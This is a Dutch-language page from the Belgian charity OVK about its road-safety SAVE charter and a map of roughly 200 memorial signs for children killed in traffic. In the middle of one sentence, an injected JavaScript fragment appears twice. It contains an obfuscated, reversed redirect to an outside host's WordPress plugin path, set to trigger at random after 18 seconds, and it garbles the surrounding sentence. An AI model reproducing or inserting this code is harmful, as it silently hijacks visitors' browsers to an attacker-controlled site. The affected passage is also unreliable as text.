Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

SAVE-herdenkingsborden in kaart gebracht

In 1996 is OVK begonnen met het plaatsen van SAVE-herdenkingsborden op de plek waar een kind of jongere verongelukte. Op dit bord staan de voornaam en leeftijd van de jongere die om het leven kwam. Met dit bord wil OVK het kind of de jongere herdenken, maar ook iedereen oproepen zich veilig te gedragen in het verkeer. De SAVE-borden hebben dus zowel een herdenkings- als een preventieve functie. Meer informatie over de SAVE-borden kunt u hier terugvinden.

Thans lanceert OVK de SAVE-kaart, waarop alle herdenkingsborden worden weergegeven. OVK plaatste toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot nog toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe ongeveer 200 SAVE-borden, waarvan een 150-tal in Vlaanderen. Om te navigeren in de SAVE-kaart en de borden te bekijken, klikt u op deze link.

Met deze kaart wenst OVK dit deel van de SAVE-actie zichtbaarder te maken bij het grote publiek.

De getallen die worden weergegeven op de kaart komen overeen met 2,3 of 4 borden die zich in elkaars nabijheid bevinden.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be